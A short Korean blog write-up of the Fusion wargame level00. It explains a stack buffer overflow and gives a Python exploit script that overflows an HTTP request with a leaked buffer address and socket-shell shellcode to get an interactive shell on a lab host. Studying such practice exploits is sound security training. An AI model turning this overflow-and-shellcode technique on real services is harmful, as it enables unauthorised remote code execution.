간단한 bof 였다. NX가 걸려있지 않고 버퍼의 주소를 알기 때문에 쉘코드를 사용했다. 다만 realpath라는 함수의 용도를 모르겠어서 약간 헤멨었다.
1 2 3 4 5 6 7 8 9 10 11 12 | from SunKn0wn import * r = remote('192.168.179.151', 20000) r.recvuntil('at 0x') buf = int(r.recv(8), 16) print "[*]buffer addr : " + str(hex(buf)) payload = 'A' * 139 payload += p32(buf + 144) payload += SocketShell32 payload = 'GET ' + payload + ' HTTP/1.1' r.recvsend(payload) r.interactive() | cs |
'Wargames > fusion' 카테고리의 다른 글
fusion level04 (0) | 2016.04.28 |
---|---|
fusion level03 (0) | 2016.04.25 |
fusion level02 (0) | 2016.04.20 |
fusion level01 (0) | 2016.04.15 |